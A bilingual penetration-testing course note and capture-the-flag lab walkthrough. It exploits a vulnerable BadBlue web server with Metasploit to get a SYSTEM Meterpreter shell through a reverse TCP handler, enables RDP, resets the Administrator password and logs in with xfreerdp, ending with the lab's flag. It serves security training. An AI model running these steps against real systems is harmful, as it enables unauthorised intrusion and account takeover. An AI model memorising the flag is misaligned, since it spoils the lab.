Enabling RDP
The Remote Desktop Protocol (RDP) is a proprietary GUI remote access protocol developed by Microsoft and is used to remotely connect and interact with a Windows system.
RDP uses TCP port 3389 by default.
RDP is disabled by default, however, we can utilize an MSF exploit module to enable RDP on the Windows target and consequently utilize RDP to remotely access to the target system.
RDP authentication requires a legitimate user account on the target system as well as the user’s password in clear-text.
启用 RDP
远程桌面协议(Remote Desktop Protocol,简称 RDP)是微软开发的专有 GUI 远程访问协议,用于远程连接 Windows 系统并与之交互。
RDP 默认使用 TCP 端口 3389。
RDP 默认情况下是禁用的,但是,我们可以利用 MSF 漏洞利用模块在 Windows 目标上启用 RDP,从而利用 RDP 远程访问目标系统。
RDP 身份验证需要目标系统上的合法用户帐户以及明文形式的用户密码。
Demo: Enabling RDP(演示:启用 RDP)
We’ll be exploring the process of how to enable RDP on a Windows target after we’ve gained access, and we’ll also take a look at how to utilize the RDP protocol so that we can authenticate with the target system via RDP and consequently gain access and interact with the target system.
The key thing that you need to take into consideration there is that it’s a graphical user interface remote access protocol, which means RDP provides you with a GUI in terms of controlling your target. It’s not like a terminal remote access tool or protocol like SSH where you need to log in and then you have access with a command prompt. In this case, you get access to the full Windows experience. So you’ll get access to the desktop.
And in our case, because we’ve only been able to get hashes, we’ll be changing the Administrator’s password, so that we can gain access to the system via RDP, as RDP will require clear text credentials.
Let’s take a look at how we can enable RDP and also utilize our RDP to authenticate and gain access to the target system.
Target IP Address: 10.2.19.254
1
2
3
4
service postgresql start && msfconsole
workspace -a RDP
setg RHOSTS 10.2.19.254
db_nmap -sV 10.2.19.254
Because we performed a default port scan that scanned 1,000 of the most common ports, we weren’t able to identify 3389 as open, so RDP by default on this system is disabled.
1
2
3
4
5
search badblue
use exploit/windows/http/badblue_passthru
show options
set target BadBlue\ EE\ 2.7\ Universal
exploit
Get user id.
1
2
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
And we currently have NT AUTHORITY\SYSTEM privileges, which are the highest privileges available on a Windows system.
Perform some local system enumeration.
1
2
meterpreter > sysinfo
Meterpreter : x86/windows
In this case, we don’t need to upgrade our Meterpreter session to a 64-bit Meterpreter session.
Enable RDP on the target system.
Put this in the background using the Ctrl+Z keyboard combination.
1
search enable_rdp
Windows Manage Enable Remote Desktop
This module enables the Remote Desktop Service (RDP). It provides the options to create an account and configure it to be a member of the Local Administrators and Remote Desktop Users group. It can also forward the target’s port 3389/tcp.
Windows 管理启用远程桌面
此模块启用远程桌面服务 (RDP)。它提供了创建帐户并将其配置为本地管理员和远程桌面用户组成员的选项。它还可以转发目标的端口 3389/tcp。
1
2
use post/windows/manage/enable_rdp
show options
We have the ENABLE options set to true, so that will enable RDP and add the firewall exception. It’ll allow us to communicate with port 3389.
And then we can perform some port forwarding. We’ll be exploring this during the pivoting video.
If you enable port forwarding, you can set up the local port to 3389, as well, and connect to your local host on port 3389, and port forwarding will handle the connection.
We also have the PASSWORD option, so that will allow you to create a user and specify the password.
However, in this case, we’re going to be changing the Administrator password.
1
2
set SESSION 1
exploit
And in this case, it looks like RDP was already enabled. We’ll need to confirm that.
We can perform a quick Nmap scan to verify that. Let’s see whether port 3389 is currently open, so that we can confirm that RDP is indeed enabled on the target.
1
db_nmap -p 3389 10.2.19.254
And in this case, we can see that port 3389 is now open, which means we now have RDP running on the target.
How do we gain access to RDP?
We need a legitimate user account on the system. Furthermore, we also need a clear-text password.
Given the fact that we already have access to the target via a Meterpreter session. We can pop up the command prompt by typing in shell.
1
2
sessions 1
meterpreter > shell
And list out the users on the system by saying net users.
1
2
3
4
5
C:\Windows\system32>net users
User accounts for \\
---------------------------------------------------------------------
Administrator Guest
We only have the Administrator and Guest user.
You can create another user account on the system, and you can do that through the Enable RDP module, as we explored.
But in this case, we are going to change the password for the Administrator user. This is not recommended, because this is an obvious indicator of compromise on the target system, because once the Administrator tries to log on, then they’re going to find out that their password has been changed, and consequently find out that the system has been hacked, so this is not really recommended.
Specify the user that we want to modify the password for. And then specify the new password.
1
C:\Windows\system32>net user administrator hacker_123321
In order to change user account passwords, you need to have administrative privileges. Otherwise, you would have to go through the process of cracking hashes or utilize Mimikatz to dump clear text passwords from memory.
Terminate the channel here, and we’ll go back to our Meterpreter session.
1
meterpreter >
Now that we have obtained legitimate credentials here, how do we interact with RDP from a Linux system?
We can create a new tab and we can utilize a utility called xfreerdp.
/u:: Specify the username that we want to authenticate as.
/p:: Specify the password here.
/v:: Specify the target host or the IP address.
1
xfreerdp /u:administrator /p:hacker_123321 /v:10.2.19.254
However, if another user is logged on, or the administrator user is currently logged on, then they will see some activity that looks strange. So this is something that you would do typically through another user account.
During a standard penetration test, I would recommend creating another user account. And then utilizing that. However, in that particular case, you will also need to add that other user account to the Administrators group, so that you have administrative privileges. Otherwise, you’ll have standard user privileges.
That is how to enable RDP on a Windows target and consequently gain access to the target system via RDP.
Windows: Enabling Remote Desktop
Overview
A Kali GUI machine and a target machine running a vulnerable application are provided to you. The IP address of the target machine is provided in a text file named target placed on the Desktop of the Kali machine (/root/Desktop/target).
Your task is to fingerprint the vulnerable application using the tools available on the Kali machine and then exploit the vulnerability using the Metasploit framework. Then, enable the target machine RDP service and access it using xfreerdp tool.
Note: rdesktop will not work on this setup as it does not support NLA. Please use xfreerdp to connect to the RDP server.
Objective: Your task is to find and exploit the vulnerable application and get the RDP session to find the flag!
Instructions:
- Your Kali machine has an interface with IP address 10.10.X.Y. Run “ip addr” to know the values of X and Y.
- The IP address of the target machine is mentioned in the file “/root/Desktop/target”
- Do not attack the gateway located at IP address 192.V.W.1 and 10.10.X.1
- Dictionaries to use: + /usr/share/metasploit-framework/data/wordlists/common_users.txt + /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
Solutions
The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-1958.pdf
Windows:启用远程桌面
概述
为您提供了 Kali GUI 机器和运行易受攻击应用程序的目标机器。目标机器的 IP 地址在位于 Kali 机器桌面 (/root/Desktop/target) 上的名为 target 的文本文件中提供。
您的任务是使用 Kali 机器上可用的工具对易受攻击的应用程序进行指纹识别,然后使用 Metasploit 框架利用该漏洞。然后,启用目标机器 RDP 服务并使用 xfreerdp 工具访问它。
注意: rdesktop 将无法在此设置上运行,因为它不支持 NLA。请使用 xfreerdp 连接到 RDP 服务器。
目标: 你的任务是找到并利用易受攻击的应用程序,并让 RDP 会话找到标志!
说明:
- 你的 Kali 机器有一个 IP 地址为 10.10.XY 的接口 运行“ip addr”来知道 X 和 Y 的值。
- 目标机器的 IP 地址在文件“/root/Desktop/target”中提到
- 不要攻击位于 IP 地址 192.VW1 和 10.10.X.1 的网关
- 使用的字典:+ /usr/share/metasploit-framework/data/wordlists/common_users.txt + /usr/share/metasploit-framework /data/wordlists/unix_passwords.txt
解决方案
本实验室的解决方案可在以下手册中找到:https://assets.ine.com/labs/ad-manuals/walkthrough-1958.pdf
复现视频内容
Target IP Address : 10.0.31.240
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
root@attackdefense:~# service postgresql start && msfconsole -q
Starting PostgreSQL 12 database server: main.
msf5 > workspace -a rdp
[*] Added workspace: rdp
[*] Workspace: rdp
msf5 > setg RHOSTS 10.0.31.240
RHOSTS => 10.0.31.240
msf5 > db_nmap -sV 10.0.31.240
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-03-01 18:40 IST
[*] Nmap: Nmap scan report for 10.0.31.240
[*] Nmap: Host is up (0.0023s latency).
[*] Nmap: Not shown: 991 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 80/tcp open http BadBlue httpd 2.7
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
[*] Nmap: 49152/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49153/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49154/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49155/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49165/tcp open msrpc Microsoft Windows RPC
[*] Nmap: Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 60.43 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
msf5 > search badblue
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/badblue_ext_overflow 2003-04-20 great Yes BadBlue 2.5 EXT.dll Buffer Overflow
1 exploit/windows/http/badblue_passthru 2007-12-10 great No BadBlue 2.72b PassThru Buffer Overflow
msf5 > use exploit/windows/http/badblue_passthru
msf5 exploit(windows/http/badblue_passthru) > show options
Module options (exploit/windows/http/badblue_passthru):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.0.31.240 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 BadBlue EE 2.7 Universal
msf5 exploit(windows/http/badblue_passthru) > set target
set target 0 set target BadBlue\ 2.72b\ Universal
set target 1 set target BadBlue\ EE\ 2.7\ Universal
msf5 exploit(windows/http/badblue_passthru) > set target BadBlue\ EE\ 2.7\ Universal
target => BadBlue EE 2.7 Universal
msf5 exploit(windows/http/badblue_passthru) > exploit
[*] Started reverse TCP handler on 10.10.21.5:4444
[*] Trying target BadBlue EE 2.7 Universal...
[*] Sending stage (180291 bytes) to 10.0.31.240
[*] Meterpreter session 1 opened (10.10.21.5:4444 -> 10.0.31.240:49231) at 2023-03-01 18:45:25 +0530
meterpreter >
1
2
3
4
5
6
7
8
9
10
11
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN-OMCNBKR66MN
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 0
Meterpreter : x86/windows
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
msf5 exploit(windows/http/badblue_passthru) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows NT AUTHORITY\SYSTEM @ WIN-OMCNBKR66MN 10.10.21.5:4444 -> 10.0.31.240:49231 (10.0.31.240)
msf5 exploit(windows/http/badblue_passthru) > search enable_rdp
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/windows/manage/enable_rdp normal No Windows Manage Enable Remote Desktop
1
2
3
4
5
6
7
8
9
10
11
12
13
14
msf5 exploit(windows/http/badblue_passthru) > use post/windows/manage/enable_rdp
msf5 post(windows/manage/enable_rdp) > show options
Module options (post/windows/manage/enable_rdp):
Name Current Setting Required Description
---- --------------- -------- -----------
ENABLE true no Enable the RDP Service and Firewall Exception.
FORWARD false no Forward remote port 3389 to local Port.
LPORT 3389 no Local port to forward remote connection.
PASSWORD no Password for the user created.
SESSION yes The session to run this module on.
USERNAME no The username of the user to create.
1
2
3
4
5
6
7
8
9
10
模块选项(post/windows/manage/enable_rdp):
名称 当前设置 需要的 说明
---- -------------- ------ ----------
ENABLE true no 启用 RDP 服务和防火墙例外。
FORWARD false no 将远程端口 3389 转发到本地端口。
LPORT 3389 no 用于转发远程连接的本地端口。
PASSWORD no 创建的用户的密码。
SESSION yes 运行此模块的会话。
USERNAME no 要创建的用户的用户名。
1
2
3
4
5
6
7
8
9
10
11
12
13
msf5 post(windows/manage/enable_rdp) > set SESSION 1
SESSION => 1
msf5 post(windows/manage/enable_rdp) > exploit
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[+] RDP Service Started
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20230301185736_rdp_10.0.31.240_host.windows.cle_422632.txt
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
msf5 post(windows/manage/enable_rdp) > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
10.0.31.240 80 tcp http open BadBlue/2.7
10.0.31.240 135 tcp msrpc open Microsoft Windows RPC
10.0.31.240 139 tcp netbios-ssn open Microsoft Windows netbios-ssn
10.0.31.240 445 tcp microsoft-ds open Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
10.0.31.240 49152 tcp msrpc open Microsoft Windows RPC
10.0.31.240 49153 tcp msrpc open Microsoft Windows RPC
10.0.31.240 49154 tcp msrpc open Microsoft Windows RPC
10.0.31.240 49155 tcp msrpc open Microsoft Windows RPC
10.0.31.240 49165 tcp msrpc open Microsoft Windows RPC
msf5 post(windows/manage/enable_rdp) > db_nmap -p 3389 10.0.31.240
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-03-01 19:01 IST
[*] Nmap: Nmap scan report for 10.0.31.240
[*] Nmap: Host is up (0.0025s latency).
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 3389/tcp open ms-wbt-server
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
msf5 post(windows/manage/enable_rdp) > sessions 1
[*] Starting interaction with 1...
meterpreter > shell
Process 1844 created.
Channel 2 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>net users
net users
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest
The command completed with one or more errors.
C:\Windows\system32>net users administrator hacker_123321
net users administrator hacker_123321
The command completed successfully.
C:\Windows\system32>^C
Terminate channel 2? [y/N] y
meterpreter >
1
root@attackdefense:~# xfreerdp /u:administrator /p:hacker_123321 /v:10.0.31.240
The flag is on the desktop: 763e1c86da26c66e86a8537fd343280d
